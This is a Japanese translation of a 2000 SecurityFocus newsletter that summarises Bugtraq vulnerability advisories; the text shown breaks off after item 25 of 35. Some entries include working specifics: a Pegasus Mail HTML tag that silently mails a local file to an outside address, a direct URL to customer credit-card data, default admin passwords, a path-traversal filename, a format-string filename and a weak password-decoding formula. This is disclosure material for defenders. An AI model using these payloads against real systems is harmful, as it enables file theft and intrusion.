SecurityFocus.com Newsletter #62 2000-09-29->2000-10-05
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
坂井@ラックです。
SecurityFocus.com Newsletter 第 62 号の和訳をお届けします。
訳のない項目については「日本語訳なし」として区別してあります。
- --------------------------------------------------------------------------
SecurityFocus.com Newsletter に関するFAQ:
<URL: http://www.securityfocus.com/forums/sf-news/faq.html>
BugTraq-JP に関する FAQ:
<URL: http://www.securityfocus.com/forums/bugtraq-jp/faq.html>
- --------------------------------------------------------------------------
引用に関する備考:
・この和訳は Security-Focus.com の許可を株式会社ラックが得た上で行わ
れています。
・SecurityFocus.com Newsletter の和訳を Netnews, Mailinglist,
World Wide Web, 書籍, その他の記録媒体で引用される場合にはメールの
全文引用をお願いします。
・日本語版ニュースレター 1 号から 3 号までにはこの備考が付いていませ
んが準用するものとします。
・また、Security-Focus.com 提供の BugTraq-JP アーカイブ [*1] へのいか
なる形式のハイパーリンクも上記に準じてください。
1) <URL http://www.securityfocus.com/templates/archive.pike?list=79>
- --------------------------------------------------------------------------
- --------------------------------------------------------------------------
この和訳に関する備考:
・この和訳の適用成果について株式会社ラックは責任を負わないものとしま
す。
- --------------------------------------------------------------------------
- --------------------------------------------------------------------------
訳者からのお知らせ:
・もし、typo や誤訳が見つかった場合、BUGTRAQ-JP へ Errata として修正
版をご投稿頂くか、訳者にお知らせください。
後者の場合には修正版をできるだけ迅速に発行します。
- --------------------------------------------------------------------------
- --------------------------------------------------------------------------
原版:
Message-ID: <Pine.GSO.4.21.0010091136040.15078-100000@mail>
Date: Mon, 9 Oct 2000 11:38:27 -0700
SecurityFocus.com Newsletter #62
- ---------------------------------
I. FRONT AND CENTER(日本語訳なし)
1. Linux Focus Area: Clear Text Communication - Slaying the Beast
II. BUGTRAQ SUMMARY
1. Apache Rewrite Arbitrary File Disclosure Vulnerability
2. Microsoft Windows 2000 Simplified Chinese IME Vulnerability
3. Slashcode Default Admin Password Vulnerability
4. WebTeacher WebData File Import Vulnerability
5. Smartwin Technology CyberOffice Shopping Cart 2.0 Price...
6. SmartWin CyberOffice Shopping Cart 2.0 Client Information...
7. Mandrake X session Local Xauthority Bypass Vulnerability
8. XFCE 3.5.1 Local Xauthority Bypass Vulnerability
9. Acme thttpd Arbitrary World-Readable File Disclosure Vulnerability
10. Pegasus Email File Forwarding Vulnerability
11. LBNL Traceroute Heap Corruption Vulnerability
12. TrendMicro PC-Cillin DoS Vulnerability
13. Bardon Data Systems WinU Weak Encrypted Password Vulnerability
14. scp File Create/Overwrite Vulnerability
15. Microsoft Windows NT 4.0 Invalid LPC Request DoS Vulnerability
16. Multiple Vendor BSD libutil pw_error() Format String Vulnerability
17. Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vuln
18. Multiple Vendor BSD fstat Format String Vulnerability
19. AOL Instant Messenger DoS Vulnerability
20. Microsoft Windows NT 4.0 / 2000 Predictable LPC Message...
21. Multiple Vendor rpc.ypupdated Vulnerability
22. Pegasus Mail Buffer Overflow Vulnerability
23. IRIX permissions File Manipulation Vulnerability
24. Multiple Vendor BSD eeprom Format String vulnerability
25. Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability
26. Microsoft IE / Outlook com.ms.activeX.ActiveXComponent Arbitrary...
27. OpenBSD photurisd Format String Vulnerability
28. Microsoft IIS 5.0 Indexed Directory Disclosure Vulnerability
29. Multiple Vendor Cfengine Format String Vulnerability
30. Microsoft Windows 2000 Unattended Install OEMPreinstall Vuln
31. OpenBSD Pending ARP Request Remote DoS Vulnerability
32. Multiple Vendor MIME Header DoS Vulnerability
33. GnoRPM Arbitrary File Overwrite Vulnerability
34. Moreover.com CGI File Disclosure Vulnerability
35. IBM WebSphere ikeyman Weak Encrypted Password Vulnerability
III. SECURITYFOCUS.COM NEWS ARTICLES
1. Carnivore Details Emerge
2. U.S. Picks New Encryption Standard
IV.SECURITY FOCUS TOP 6 TOOLS
1. Samhain 0.9.5
2. BUGS 3.4.3
3. Linux Intrusion Detection System (LIDS) 0.9.9
4. Snorticus 1.0
5. The Coroner's Toolkit (TCT) 1.03
6. Bcrypt 2.3
I. FRONT AND CENTER(日本語訳なし)
- ---------------------------------
II. BUGTRAQ SUMMARY
- -------------------
1. Apache Rewrite Arbitrary File Disclosure Vulnerability
BugTraq ID: 1728
リモートからの再現性: あり
公表日: 2000-09-29
関連するURL:
http://www.securityfocus.com/bid/1728
まとめ:
mod_rewrite は Apache 1.2 およびそれ以降の版に含まれるモジュールである。
これは特別な URL を Web サーバ上のファイルシステム内にあるファイルへ対
応づけるために用いられている。
もし、RewriteRule ディレクティブが正規表現を含むようなファイルへ対応づ
けられている場合、この結果、攻撃者はホスト上のファイルが参照できるよう
になってしまう。
RewriteRule ディレクティブの例: (最初の行が問題となり得る例である)
RewriteRule /test/(.*) /usr/local/data/test-stuff/$1
RewriteRule /more-icons/(.*) /icons/$1
RewriteRule /go/(.*) http://www.apacheweek.com/$1
(なお、この情報は Apache development リストの 09-22 に依った)
2. Microsoft Windows 2000 Simplified Chinese IME Vulnerability
BugTraq ID: 1729
リモートからの再現性: なし
公表日: 2000-09-29
関連するURL:
http://www.securityfocus.com/bid/1729
まとめ:
Input Method Editor とは標準的な 101 キーボードで表意文字(例えば中国語、
韓国語)の入力を可能にするソフトウェアである。物理的、あるいは仮想的
(例えば、Terminai Server のセッションを介して)に簡体字用の中国語 IME が
インストールされている Windows 2000 にアクセス可能な、いかなるユーザが
LocalSystem の権限で、そうあるべきいかなる手続きを提供することなく、ロ
グインできてしまう問題が発見された。
通常、IME はある特定のユーザのセキュリティ権限下で動作しなければならな
い。しかし、ログオン画面の処理中において、簡体字用の中国語 IME は
LocalSystem の権限 (これは OS の権限である) で動作し、未ログオン状態の
ユーザへは利用させてはならない機能を表示してしまうのである。
この問題のため、いかなるユーザがユーザ名およびパスワードを入力すること
なくインタラクティブにシステムへログオン可能なのである。この問題を突い
た攻撃が成功した場合、システムへのフルアクセス、システムの完全な権限奪
取が可能となる。
この問題は簡体字地域向け中国語版 Windows 2000 で生じる。システムセット
アップ時に簡体字用の IME をすでにインストール済みである場合にのみ、英語
版の Windows 2000 でも同様の問題が考えられる。システムセットアップ時に
組み込まれていない場合には、英語版はこの問題の影響を受けない。
3. Slashcode Default Admin Password Vulnerability
BugTraq ID: 1731
リモートからの再現性: あり
公表日: 2000-09-29
関連するURL:
http://www.securityfocus.com/bid/1731
まとめ:
Slashcode は掲示板、メッセージボードシステムとして設計されたデータベー
スである。
Slashcode のインストール時にはデフォルトパスワードを管理者が変更する様
には問い掛けられないため、管理者用アカウントへ seclev 権限でアクセス可
能なユーザはブロックを置換えできてしまえる可能性がある。
アカウント名は God であり、author あるいは author1 が変更されていない
場合のデフォルトのパスワードである。
この問題を突いた攻撃が成功した場合、ユーザは管理者としてブロックを挿入
することで、意図的なコードを実行できてしまえる。そしてさらにはシェルへ
アクセスできてしまうか、データベースへアクセスできてしまえる可能性が考
えられる。
4. WebTeacher WebData File Import Vulnerability
BugTraq ID: 1732
リモートからの再現性: あり
公表日: 2000-10-02
関連するURL:
http://www.securityfocus.com/bid/1732
まとめ:
WebTeacher WebData は World Wide Web 資源内を探査するデータベースプログ
ラムである。
WebData へ正当なアカウントを持ついかなるユーザは WebData ディレクトリへ
システム内のアクセス可能ないかなるファイルをインポートできる可能性がある
問題がある。これは、ユーザが / ディレクトリ以下のいかなるファイルへ、デー
タベースを介して、例え WebData が特定のファイルへアクセスする様に設定さ
れていたとしても、アクセスできることが証拠となる。
インポート機能は通常、ファイルのデータベースへのアップロードを限定された
ユーザが可能としておくべきである。しかし、このソフトウェアではいかなるファ
イルであってもサーバへインポートできてしまえるのである。
5. Smartwin Technology CyberOffice Shopping Cart 2.0 Price Modification Vuln
BugTraq ID: 1733
リモートからの再現性: あり
公表日: 2000-10-02
関連するURL:
http://www.securityfocus.com/bid/1733
まとめ:
Smartwin Technology CyberOffice Shopping Cart は電子商取引用のショッピ
ングカート機能を Windows NT 4.0 あるいは 2000 上で提供するアプリケーショ
ンである。
しかし、このソフトウェアの注文フォームはローカルへフォームをダウンロード
すターゲットへ新しい値を入れた上で再度注文処理を行うことで、容易に改変可
能である。
各商品の価格毎の量はいかなる意図した値へ置換え可能である。
6. SmartWin CyberOffice Shopping Cart 2.0 Client Information Disclosure Vuln
BugTraq ID: 1734
リモートからの再現性: あり
公表日: 2000-10-02
関連するURL:
http://www.securityfocus.com/bid/1734
まとめ:
Smartwin Technology CyberOffice Shopping Cart は電子商取引用のショッピ
ングカート機能を Windows NT 4.0 あるいは 2000 上で提供するアプリケーショ
ンである。
しかし、このアプリケーションを動作している Web サイト内の _private ディ
レクトリへリモートのユーザが読み出し可能という問題が存在する。
デフォルトで _private ディレクトリにはどのようなユーザに対してでも読み
出し可能な権限が与えられている。このディレクトリへは顧客の秘密情報
(顧客の注文情報、暗号化されていないクレジットカード情報等)が Microsoft
Access 形式で格納され、これは攻撃者がアクセス可能なのである。
攻撃者はこれへアクセスするためにブラウザで
"http://target/_private/shopping_cart.mdb" へアクセスするだけでよい。
7. Mandrake X session Local Xauthority Bypass Vulnerability
BugTraq ID: 1735
リモートからの再現性: なし
公表日: 2000-09-29
関連するURL:
http://www.securityfocus.com/bid/1735
まとめ:
Mandrake 7.1 に含まれる X11 起動用スクリプト (/etc/X11/Xsession) には
xhost + localhost という行が含まれる。これは localhost に対しては
Xauthority 機構を使用停止し、localhost のいかなるユーザの X クライア
ントは X へ接続可能にすることを意味している。しかしこの設定は、複数の
ユーザがログインする可能性があるシステムにおいては、X を使った攻撃を
行えてしまうという危険性がある。
(キーワード logging、window watching等)
この結果、直接的な可能性として権限の上昇(攻撃者が root になるために su
コマンドを実行した場合)、あるいは他の可能性(例えば他のホストとの信頼関
係があった場合)が考えられる。
8. XFCE 3.5.1 Local Xauthority Bypass Vulnerability
BugTraq ID: 1736
リモートからの再現性: なし
公表日: 2000-10-02
関連するURL:
http://www.securityfocus.com/bid/1736
まとめ:
XFce は様々な UNIX システム向けのデスクトップ環境を提供するソフトウェア
である。このソフトウェアのバージョン 3.5.1 に含まれるスタートアップスク
リプト /etc/X11/xfce/xinitrc には以下に示す行が含まれている。
xhost +$HOSTNAME
しかしこの設定は、複数の
ユーザがログインする可能性があるシステムにおいては、X を使った攻撃を
行えてしまうという危険性がある。
(キーワード logging、window watching等)
この結果、直接的な可能性として権限の上昇(攻撃者が root になるために su
コマンドを実行した場合)、あるいは他の可能性(例えば他のホストとの信頼関
係があった場合)が考えられる。
9. Acme thttpd Arbitrary World-Readable File Disclosure Vulnerability
BugTraq ID: 1737
リモートからの再現性: あり
公表日: 2000-10-02
関連するURL:
http://www.securityfocus.com/bid/1737
まとめ:
Acme thttpd HTTP サーバには thttpd の拡張用 CGI プログラムとして ssi
と呼ばれる、他の HTTP デーモンには組み込み済みの Server Side Include
機能を提供するためのプログラムが含まれている。
ssi スクリプトを用い、ファイル名はフィルタされ、ssi へ PATH_TRANSLATED
環境変数が結果として与えられる。この際、特定のエスケープシーケンスは
ssi によっては適切にフィルタリングされず、結果として、改ざんされた URL
を与えることにより(フィルタリングをバイパスするために HEX 表記で置換
えた .. を用いる)、攻撃者は Web サーバ上の既知の場所にある意図するファ
イルを参照できてしまえるのである。
10. Pegasus Email File Forwarding Vulnerability
BugTraq ID: 1738
リモートからの再現性: あり
公表日: 2000-10-03
関連するURL:
http://www.securityfocus.com/bid/1738
まとめ:
悪意ある Web サイトの管理者は、Web サイトへアクセスしたユーザが Pegasus
Mail クライアントを実行した際、リモートのシステムの既知のファイルのコピー
を入手できる問題が発見された。
以下に示すコードが HTML 文書内に含まれ、特定の Web ページ内のこのコー
ドをユーザが読み込んだ場合、ローカルのファイルは自動的にこのソフトウェ
アを介して事前の警告なしに送付されてしまうのである。
<img src="mailto:email@address.com -F c:\path\file.ext">
11. LBNL Traceroute Heap Corruption Vulnerability
BugTraq ID: 1739
リモートからの再現性: なし
公表日: 2000-09-28
関連するURL:
http://www.securityfocus.com/bid/1739
まとめ:
traceroute は非常に知られた、2ホスト間のネットワークのパスを解析するた
めのネットワーク分析ツールである。UNIX システムにおいて、traceroute コ
マンドは典型的に setuid root でインストールされている。これは raw ソケッ
トを取り扱わねばならないからである。特定のバージョンの LBNL traceroute
は、未割り当てのメモリを指し示すポインタの解放を伴う興味深い攻撃方法を
受けてしまうという問題がある。
traceroute が -g x -g x という引数で起動される際、savestr() 関数が二回
呼び出される。この関数は、strdup() 関数が別箇に malloc() 関数を呼ばない
様な処理を行う。そしてホスト名、あるいはピリオドで区切られた IP アドレス
を -g パラメータへ与えられた際に呼び出されている。
この関数は、関数自身に割り当てられたメモリに代えて、予め割り当て済みの
メモリを用いる。最初のインスタンスである -g が解釈され、savestr() 関数
が呼び出された際、savestr()関数で用いられるメモリブロックへのポインタは
free()関数によっては解放されない。また、さらに次のゲートウェイパラメータ
(-g) が解釈される際、savestr() は再度呼び出されユーザが与えたデータは未
解放の領域へ書き込まれてしまう。この場合、最初のインスタンスと同様に、
free() 関数は未解放のメモリ上の古いバッファ内にデータが始まっている様な
ポインタにおいて呼び出されるのである。free() 関数が正しい malloc された
領域のヘッダをポインタの前に見つけられない場合、それはそのまま解釈され
てしまい、結果、tracerote はクラッシュしてしまう。
この問題を突いた攻撃が考えられる場合は、ポインタが指しているメモリ領域
がユーザによってコントロールされ得、free() 関数が呼ばれる前になんからか
の意図するデータで書き込み可能である場合である。攻撃者はこの場合、悪意
ある malloc ヘッダを作成し注意深く最初の savestr() が利用するバッファへ
、以後 free() が二番目の savestr() が呼ばれた後に参照する様に埋め込む可
能性が考えられ得る。この問題を突いた攻撃を面倒なものにしている点は、
savestr() 関数が必要としている関数、バッファへ与えられるユーザからのデー
タ種に限りがある inet_addr() と gethostbyname() である。
(与えられる値はバイナリでなければならない)
しかし、もしも巧妙に処理がなされた場合、ヒープ内の意図する場所を意図する
データで上書き可能である。(function ポインタが挙げられる)
攻撃者により、この問題を突いた攻撃が成功した場合、ローカルからの root
権限の奪取が可能である。
12. TrendMicro PC-Cillin DoS Vulnerability
BugTraq ID: 1740
リモートからの再現性: あり
公表日: 1999-12-30
関連するURL:
http://www.securityfocus.com/bid/1740
まとめ:
PC-cillin はネットワークに対する、あるいはデスクトップ環境に対するアンチ
ウイルスプログラムである。Java/ActiveX 保護機能はすべての HTTP リクエスト
をポート番号 8431 で待ち受ける内部用プロキシで提供されている。
改ざんされた HTTP リクエストをポート番号 8431 へ与えることでターゲットと
なったシステムを利用できるだけの CPU 資源を利用し尽くさせることが可能で
ある。通常動作への復旧はサービスの再起動が必要である。
13. Bardon Data Systems WinU Weak Encrypted Password Vulnerability
BugTraq ID: 1741
リモートからの再現性: あり
公表日: 2000-08-16
関連するURL:
http://www.securityfocus.com/bid/1741
まとめ:
Bardon Data Systems WinU は Windows 95/98/NT 用のセキュリティ機能付きの
ユーザインタフェースの置換えソフトウェアである。
このソフトウェアのバージョン 5.2 以前のバージョンでは管理用パスワードを
暗号化するために脆弱な暗号化手法を取っている。パスワードはバージョンにも
依るが、HKEY_CLASSES_ROOT\WinU4\Config or HKEY_CLASSES_ROOT\WinU5\Config
へ格納されている。
バージョン 4.x から 5.0 において、暗号化を施すための式は以下の様になって
いる。
154 - アスキーコードの値 = 暗号化された値
例えば、A に対応するアスキーコードの値は 65 であり、暗号化された後では
89 となる。パスワードはこの処理を行ってから元の値が分からない様に置換え
られる。
バージョン 5.1 では、以下が暗号化を施すための式である。
アスキーコードの値 + 101 = 暗号化された値
管理用パスワードを入手することで、WinU インタフェースのフルコントロール
が可能である。
14. scp File Create/Overwrite Vulnerability
BugTraq ID: 1742
リモートからの再現性: あり
公表日: 2000-09-30
関連するURL:
http://www.securityfocus.com/bid/1742
まとめ:
scp のバージョン 1.2.x に、サーバ側に改変された scp バイナリを置き、
それを適当に用いることができるならば、リモートサーバはローカルのパス
名をスプーフィングし、ローカルのユーザが持つファイルを上書きできてし
まえる問題が発見された。
例えば、以下のコマンドにおいて、
scp user@remotehost:/somefile /home/user/newfile
リモートにある改変されたサーバはファイル名を、例えば ../../etc/passwd
の様に送付し、ローカルのユーザの scp はデータを /home/user/../../etc/passwd
へ送信する。
(/home/user/../../etc/passwd は /etc/passwd と同値である)
なお、特記しておかねばならない点として、これはローカルユーザがターゲッ
トとなるファイルへ書き込み権限を持ち得る場合にのみターゲットとなるファ
イルは上書きできてしまえるという点がある。この結果から、scp を root 権
限で実行することが推奨できないということが思い出されよう。
この問題はリモートのコンピュータで ssh バージョン 1.2.x が動作している
場合、クライアントのバージョンには関係なく生じる。
リモート側に ssh-2.x を利用している場合、異なるプロトコールが利用され
ており、この結果を反映し、この問題の影響は受けないと報告されている。
15. Microsoft Windows NT 4.0 Invalid LPC Request DoS Vulnerability
BugTraq ID: 1743
リモートからの再現性: なし
公表日: 2000-10-03
関連するURL:
http://www.securityfocus.com/bid/1743
まとめ:
LPC (Local Procedure Call) とはスレッドおよびプロセスに、RPC (Remote
Procedure Call) が異なるホスト間で通信を行えるようにするのに対して、
ローカルのコンピュータ内で互いに通信を行なえる様にするメッセージ交換
サービスである。
このプロトコールの Windows 4.0 での実装は範囲外や不正なパラメータの利
用があった場合の LPC のリクエストを十分に取り扱っていないのである。
クライアントからサーバが LPC のリクエストを受け取った際、通常のサーバ
の手続きは NtAcceptConnectPort 関数と NtCompleteConnectPort 関数をコネ
クションを完全に行うために呼び出す様になっている。しかし、もしサーバが
NtAcceptConnectPort に代えて NtReplyPort を呼んだ場合、クライアントは
カーネル例外のためにクラッシュしてしまう。
付け加えるならば、もしクライアントが \DbgSsApiPort あるいは \DbgUiApiPort
に接続し、ランダムなデータを与えた場合、クライアントはクラッシュしてし
まう。
これらのシナリオのどちらの場合であっても、通常動作への復旧はシステムの
再起動が必要である。
この問題はユーザがインタラクティブにログオンできる場合にのみ生じさせる
ことが可能である。従って、リモートからこの問題を突いた攻撃は不可能であ
る。
他の Windows NT の LPC の実装に由来した問題、Microsoft Security Bulletin
(MS00-070)、Bindview's Security Advisory は該当する Bugtraq ID の
Credit セクションを参照されたい。
16. Multiple Vendor BSD libutil pw_error() Format String Vulnerability
BugTraq ID: 1744
リモートからの再現性: なし
公表日: 2000-10-04
関連するURL:
http://www.securityfocus.com/bid/1744
まとめ:
libutil は共有ライブラリであり、数多くの異なる UNIX ユーティリティコマ
ンドで使われる「標準的な」関数群を含む、ほぼほとんどの UNIX で利用され
ている。しかし、BSD の libutil には書式指定子の取り扱いに由来する問題
(format string vulnerability)がsetuid されたユーティリティ、chpass で
利用されている pw_error() 関数に存在する。
pw_error() 関数の中で、ユーザからの入力はただ一つの引数として printf()
関数へ引き渡されるため、攻撃者はスタック内を操作可能な条件が成立してし
まうのである。もし書式指定子が関数へ与えられた文字列へ含まれていた場合、
printf() 関数は、実際通常であれば値を参照すべきスタックではない別の参
照先を参照してしまうのである。書式指定子を使い、メモリへ書き込みができ
得るという事実と組み合わせることで、攻撃者は例えば関数のリターンアドレ
スをユーザが与えた文字列の中のシェルコードを指し示す様に再構成できるの
である。
関数からリターンされる際がスタック内のシェルコードの実行の開始時点であ
る。
この問題を突いた攻撃の結果はローカルの root 権限の奪取を引き起こす。
17. Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability
BugTraq ID: 1745
リモートからの再現性: なし
公表日: 2000-10-03
関連するURL:
http://www.securityfocus.com/bid/1745
まとめ:
LPC (Local Procedure Call) とはスレッドおよびプロセスに、RPC (Remote
Procedure Call) が異なるホスト間で通信を行えるようにするのに対して、
ローカルのコンピュータ内で互いに通信を行なえる様にするメッセージ交換
サービスである。
LPC は特別のプールから LPC Zone と知られている場所へメッセージストレー
ジのためのメモリを割り当てる。もし LPC Zone が受け取ったメッセージの
量を取り扱えないほどのメモリを割り当てた場合、メモリはカーネルから
LPC Zone へ割り当てられる。通常の場合、メモリは LPC Zone がもはや使わ
れなくなった場合にはカーネルへ返却されるべきである。しかし、特別に組
み立てられたリクエストを作成することで、もしリクエストが繰り替えられ
た場合には、メモリを LPC Zone によって利用できるだけすべてのカーネル
メモリを使い切るように仕向けることが可能なのである。
通常動作への復旧はシステムの再起動が必要である。
この問題はユーザがインタラクティブにログオンできる場合にのみ生じさせる
ことが可能である。従って、リモートからこの問題を突いた攻撃は不可能であ
る。
他の Windows NT の LPC の実装に由来した問題、Microsoft Security Bulletin
(MS00-070)、Bindview's Security Advisory は該当する Bugtraq ID の
Credit セクションを参照されたい。
18. Multiple Vendor BSD fstat Format String Vulnerability
BugTraq ID: 1746
リモートからの再現性: なし
公表日: 2000-10-04
関連するURL:
http://www.securityfocus.com/bid/1746
まとめ:
fstat は BSD 由来の UNIX においてシステム上で開かれているファイルの状態
を取得するためのプログラムである。このプログラムはカーネルメモリストラ
クチャから開かれているファイルの情報を入手するために sguid kmem でイン
ストールされている。
ユーザが定義可能な環境変数 PWD (Parent Working Directory) は printf()関
数へのただ一つの引数としてこのプログラムで用いられている。このため、
ユーザはこのコマンドを PWD の値として悪意ある書式指定子付き文字列を与え
ることができるのである。環境変数内に含められ得た書式指定子付き文字列は、
printf() 関数がスタック上の特定のバイトだけを上書きする(関数のリターン
アドレスの戻り先を含めて文字列は与えられている)様に解釈され、実行処理は
操作されてしまうのである。
攻撃者がこの弱点を突くことによって、グループ kmem の権限が奪取されてし
まう可能性がある。gid kmem が奪取されることが、さらなる脅威 (例えば、
root 権限の奪取) を引き起こすことは明白である。
この問題は多くの新式な BSD 由来のシステムで有り得るとされているが、OpenBSD
においてのみ確認がされている。
19. AOL Instant Messenger DoS Vulnerability
BugTraq ID: 1747
リモートからの再現性: あり
公表日: 2000-10-03
関連するURL:
http://www.securityfocus.com/bid/1747
まとめ:
AOL Instant Messenger はネットワークに接続しているユーザ間でリアルタイ
ムのメッセージ交換を提供するアプリケーションである。
Netscape と共に提供されている AOL Instant Messenger には DoS を引き起こ
されてしまう問題がある。通常有り得ない数の %s をファイル名に持つファイ
ルを Windows NT あるいは 2000 を動作しているユーザへ送ることで、このア
プリケーションはこのアプリケーションのウィンドウ内に表示されたファイル
名を解釈する際にクラッシュしてしまう。
通常動作への復旧にはアプリケーションの再起動が必要である。
ファイル名の例: %s%s%s%s%s%s%s%s%s%s.jpg
20. Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier
Multiple Vulnerabilities
BugTraq ID: 1748
リモートからの再現性: なし
公表日: 2000-10-03
関連するURL:
http://www.securityfocus.com/bid/1748
まとめ:
LPC (Local Procedure Call) とはスレッドおよびプロセスに、RPC (Remote
Procedure Call) が異なるホスト間で通信を行えるようにするのに対して、
ローカルのコンピュータ内で互いに通信を行なえる様にするメッセージ交換
サービスである。
以下に示すメッセージのストラクチャを考える。
(これは該当する Bugtraq ID の Credit にある Bindview Security Advisory
からの引用である。)
typedef struct lpc_msg {
unsigned short data_len;
unsigned short msg_len; /* normally data_len + sizeof (struct lpc_msg) */
unsigned short msg_type;
unsigned short address_range_offset;
unsigned long pid; /* process id of client */
unsigned long tid; /* thread id of client */
unsigned long mid; /* message id for this message */
unsigned long callback_id; /* callback id for this message */
/* unsigned char buff[0]; data_len bytes of data for this message */
} LPC_MSG;
NT の LPC のメッセージの送り主を確認する実装には問題が潜んでいる。
クライアントがサーバと接続を試みる際、サーバは NtAcceptConnectPort
から新しいハンドルを受け取る。しかし、サーバはこのハンドルを使わず、
NtCreatePort 関数から取得したオリジナルのハンドルを利用してしまうの
である。これは上に示した PID (Process Identifier)、TID (Thread Identifier)、
MID (Message Identifier) を操作する。LPC メッセージ中の MID は予測
可能であり、MID の値を取得しているプロセスはいかなるものであってもその
値を利用可能である。このことは、数多くの攻撃、例えば DoS、セッション乗っ
取り、Eavesdropping、権限上昇といったものをもたらす可能性がある。
問題1:
この問題は Windows NT 4.0 に対してのみ影響し、2000 に対してはそうではな
い。ポートへのコネクションへの乗っ取りはいかなるプロセスであっても
NtAcceptConnectPort を呼び出せてしまうがために発生する。この API は
既存のポートハンドルに代えて LPC_MSG、PID、TID、MID だけをリクエストす
る。もしこれら3種類の identier が既存のコネクションリクエストに対して
与えられた場合、プロセスは特定のポートに対するハンドルを与えられてしま
うのである。クライアントからのプロセスリクエストは権限を奪取できてしま
えたのである。
問題2:
LPC クライアントとサーバ間で、NtReadRequestData と NtWriteRequestData
を用いることでデータをやり取り可能である。これら2つの関数はサーバがク
ライアントによって指定されたクライアントのアドレス空間を読み書きできる
様にするためのものである。クライアントのストラクチャは以下の様に示され
る。
struct addr_ranges {
unsigned long num_entries;
struct addr_entry {
void *addr;
size_t len;
} addrs[N]; /* where N is num_entries */
};
このストラクチャは、クライアントメッセージのデータの受け渡し部に利用さ
れ、LPC_MSG にある address_range_offset はストラクチャのオフセットに設
定される。サーバは NtReadRequestData とd NtWriteRequestData を用いて
指定されたアドレス幅を読み書きできるようになるのである。
しかし、受け渡しを行うクライアントがこれら関数をサーバとして操作でき、
また、他のクライアントからのメモリのアクセス部を提供している場合、他の
クライアントが address_range_offset を操作する際には元々のクライアント
は正しい元々の PID、TID、MIDを提供できてしまえるのである。
問題3:
address_range_offset 失効を与えることで大量の LPC リクエストを作成し、
システム内 (2 の 32 乗)で利用可能名すべての MID を利用し尽くさせること
が可能である。もし、この現象が起こってしまった場合、サーバはラップを起
こし、既存のリクエストへ溢れた MID リクエストを割り当ててしまうのであ
る。このため、ある一つのクライアントがサーバから他のクライアントへ不適
当な応答を返すように仕向けることが可能なのである。
この問題はユーザがインタラクティブにログオンできる場合にのみ生じさせる
ことが可能である。従って、リモートからこの問題を突いた攻撃は不可能であ
る。
他の Windows NT の LPC の実装に由来した問題、Microsoft Security Bulletin
(MS00-070)、Bindview's Security Advisory は該当する Bugtraq ID の
Credit セクションを参照されたい。
21. Multiple Vendor rpc.ypupdated Vulnerability
BugTraq ID: 1749
リモートからの再現性: あり
公表日: 1995-12-19
関連するURL:
http://www.securityfocus.com/bid/1749
まとめ:
rpc.ypupodated は Network Information Service (NIS) あるいは Yellow Page(YP)
の一部を構成するデーモンである。このデーモンはクライアントから NIS マッ
プの更新できる機能を提供している。このデーモンには悪意あるユーザが root
権限でコマンドを実行できてしまえる問題がある。
リクエストを受け付けた後で、NIS マップを更新するためにこのデーモンは、
ボーンシェル(訳注: sh)のコピーを make コマンドを使い、マップを変更が
成功したかどうかに関わりなく変更するために実行する。
make が実行される際の入力範囲の確認が不適切であるため、攻撃者はシェルへ
メタキャラクタを渡せ、コマンドが実行可能である。
これは Sun の BugID では 1230027 と 1232146 になっている。
22. Pegasus Mail Buffer Overflow Vulnerability
BugTraq ID: 1750
リモートからの再現性: あり
公表日: 2000-09-26
関連するURL:
http://www.securityfocus.com/bid/1750
まとめ:
Pegasus Mail v3.11 にはメッセージのボディ内に約 90 K bytes 以上のデー
タが与えられた際バッファオーバーフローを生じ、プログラムのクラッシュは
引き越され、リモートからのコードの実行が考えられ得るという問題がある。
23. IRIX permissions File Manipulation Vulnerability
BugTraq ID: 1751
リモートからの再現性: なし
公表日: 1995-03-02
関連する URL:
http://www.securityfocus.com/bid/1751
まとめ:
IRIX の /usr/lib/desktop/permissions ツールは、suid かつ sgid root に設
定され、ファイルのパーミッションを変更するためアプリケーションである。
このツールは、通常、権限のあるファイルのみを扱える。しかし、このツール
には、悪意のあるユーザによってシステム上の任意のファイルのパーミッショ
ンを変更できてしまう問題がある。
これは、SGI SCR # 265071 として登録されている。
権限のないファイルのパーミッションを変更しようと試みた場合、permissions
ツールは、ファイルの所有者の名前とパスワードを入力するように要求する。
しかし、ターゲットファイルのパーミッションの変更がなされるのは、"Apply"
をダブルクリックした場合、パスワードを入力する前なのである。
24. Multiple Vendor BSD eeprom Format String vulnerability
BugTraq ID: 1752
リモートからの再現性: なし
公表日: 2000-10-04
関連する URL:
http://www.securityfocus.com/bid/1752
まとめ:
eeprom は、Sparc システムのハードウエア、EEPROM の内容の表示および書き
込みに使用されるユーティリティである。これはカーネルメモリから読み出し、
書き込みを行なうため、しばしば setgid kmem でインストールされる。NetBSD
と OpenBSD (の SPARC 版) に同梱されている (NetBSD のeeprom から派生した)
eeprom のバージョンには、書式指定を含んだ文字列を使った攻撃をローカルか
ら実行できる弱点がある。
この問題が生じるのは、eeprom フィールドの読み込み、または書き込みに失敗
した後、エラーメッセージが出力された時である。ユーザ入力を一部に含んでい
る文字列が、printf 関数() (この関数の引数は、"field name" で、コマンド
ラインから入力される) に渡される。その結果、ユーザがスタック上の任意の
場所に書き込むためのフォーマットフィールドに書式指定子を挿入することが
可能である。スタック上のデータが一般のユーザによって上書きできる場合、
実行手順を変更することができ、ユーザが入力したマシン語プログラムを実行
させてしまう。
攻撃者がこの弱点を突くことによって、グループ kmem の権限が奪取されてし
まう可能性がある。gid kmem が奪取されることが、さらなる脅威 (例えば、
root 権限の奪取) を引き起こすことは明白である。
25. Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability
BugTraq ID: 1753
リモートからの再現性: なし
公表日: 2000-10-03
関連する URL:
http://www.securityfocus.com/bid/1753
まとめ:
この弱点は、2000 年 1 月 12 日に Bindview によって報告された
NT LPC Privilege Escalation Vulnerabilty
(詳細は、http://www.securityfocus.com/bid/934 を参照されたい) の新種で
ある。同日 Microsoft から発行されたパッチ
(http://www.microsoft.com/technet/security/bulletin/ms00-003.asp) では、
この新しい問題について言及されていない。
この偽造された LPC に対する応答を突く弱点の新種には多数の前提条件が必要
である。これは、現在実行されているプロセスのみを成りすますことができ、
LPC 識別子が特定されなければならない場合である。同様に、この弱点を突く
ことに成功するためには、LPC リクエストがなされたと同時に、リクエストが
実行されなければならない。
攻撃に成功すれば、ローカルマシン上で、権限の上昇が可能である。
